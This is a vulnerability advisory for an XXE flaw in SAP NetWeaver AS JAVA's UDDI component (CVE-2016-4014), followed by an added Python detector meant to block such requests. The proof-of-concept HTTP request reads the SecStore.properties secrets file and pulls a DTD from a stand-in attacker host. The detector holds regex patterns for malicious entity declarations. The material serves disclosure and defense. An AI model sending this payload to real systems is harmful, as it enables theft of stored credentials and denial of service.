ERPScan advisory ERPSCAN-16-020
Published: Oct 20, 2015

SAP NetWeaver JAVA AS UDDI component - XXE vulnerability

Source: erpscan.io

EPSS: 0.013 (percentile 86.0%)

Application: SAP AS JAVA
Versions Affected: SAP AS JAVA 7.4
Vendor URL: SAP
Bugs: XXE
Reported: 20.10.2015
Vendor response: 21.10.2015
Date of Public Advisory: 14.04.2016
Reference: SAP Security Note 2254389
Author: Vahagn Vardanyan (ERPScan)

Vulnerability Information

Class: denial of service
Impact: denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE: CVE-2016-4014

CVSS Information

CVSS v3 Base Score: 7.1 / 10
CVSS v3 Base Vector:

AV: Attack Vector (Related exploit range) Network (N)
AC: Attack Complexity (Required attack complexity) Low (L)
PR: Privileges Required (Level of privileges needed to exploit) None (N)
UI: User Interaction (Required user participation) None (N)
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) Unchanged (U)
C: Impact to Confidentiality None (N)
I: Impact to Integrity None (N)
A: Impact to Availability High (H)

VULNERABILITY DESCRIPTION

An unauthenticated remote attacker can trigger XML Entity Expansion or XML External Entity (XXE) injection in the UDDI component. This causes the entire machine to become unresponsive until the process is terminated manually, so the flaw can be used for a denial-of-service (DoS) attack.

VULNERABLE PACKAGES

SAP NetWeaver AS JAVA 7.4
Other versions are probably affected too, but they were not checked.

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2254389.

TECHNICAL DESCRIPTION

Proof of Concept

POST /uddi/api/replication HTTP/1.1
Content-Type: text/xml; charset=utf-8

<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///C:/usr/sap/DM0/SYS/global/security/data/SecStore.properties">
<!ENTITY % dtd SYSTEM "http://evil_host/evil_.dtd">
%dtd;]>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
  <SOAP-ENV:Header/>
  <SOAP-ENV:Body>
    <do_ping>
      <authInfo/>
      <findQualifiers>
        <findQualifier>FINDQUALIFIER</findQualifier>
      </findQualifiers>
      <tModelBag>
        <tModelKey>asd</tModelKey>
      </tModelBag>
    </do_ping>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
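Until the note is applied, a reverse proxy or WAF in front of the UDDI endpoint can reject request bodies of the shape shown above. The following detector is an added example, not part of the advisory or of SAP's code: it flags a DOCTYPE, an external (SYSTEM/PUBLIC) entity, a parameter entity, or an unusual number of entity declarations in any text/xml body. The sample requests are constructed with placeholder host and path, and the entity-count threshold is an assumed value.

```python
import re
# Constructed samples (not from the advisory): the PoC's shape with placeholders, and a benign do_ping.
HEADERS = "POST /uddi/api/replication HTTP/1.1\r\nContent-Type: text/xml; charset=utf-8\r\n\r\n"
SOAP_BODY = (
    '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">'
    "<SOAP-ENV:Body><do_ping><authInfo/></do_ping></SOAP-ENV:Body></SOAP-ENV:Envelope>"
)
XXE_DTD = (
    "<!DOCTYPE foo [\n"
    '<!ENTITY % file SYSTEM "file:///PLACEHOLDER_PATH/SecStore.properties">\n'
    '<!ENTITY % dtd SYSTEM "http://PLACEHOLDER_HOST/evil.dtd">\n'
    "%dtd;]>\n"
)
XXE_REQUEST = HEADERS + XXE_DTD + SOAP_BODY
BENIGN_REQUEST = HEADERS + SOAP_BODY

# SOAP 1.1 forbids a DTD in a message, so a DOCTYPE in a SOAP body is already out of spec on its own.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.I)
EXTERNAL_ENTITY_RE = re.compile(r"<!ENTITY\s+(%\s*)?\S+\s+(SYSTEM|PUBLIC)\b", re.I)
PARAM_ENTITY_RE = re.compile(r"<!ENTITY\s+%", re.I)
ENTITY_DECL_RE = re.compile(r"<!ENTITY\b", re.I)
MAX_ENTITY_DECLS = 10  # assumed threshold; entity-expansion payloads declare many entities

def split_request(raw):
    """Split a raw HTTP request into (request line, lowercase header dict, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def xxe_findings(body):
    """Return the names of the DTD-related checks the body trips, in a fixed order."""
    checks = [
        ("doctype-declaration", DOCTYPE_RE.search(body) is not None),
        ("external-entity", EXTERNAL_ENTITY_RE.search(body) is not None),
        ("parameter-entity", PARAM_ENTITY_RE.search(body) is not None),
        ("entity-expansion", len(ENTITY_DECL_RE.findall(body)) > MAX_ENTITY_DECLS),
    ]
    return [name for name, hit in checks if hit]

def inspect_request(raw):
    """Only XML bodies are inspected; any finding means the request should be blocked."""
    request_line, headers, body = split_request(raw)
    path = request_line.split()[1]
    is_xml = "xml" in headers.get("content-type", "").lower()
    findings = xxe_findings(body) if is_xml else []
    return {"path": path, "findings": findings, "block": bool(findings)}
```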
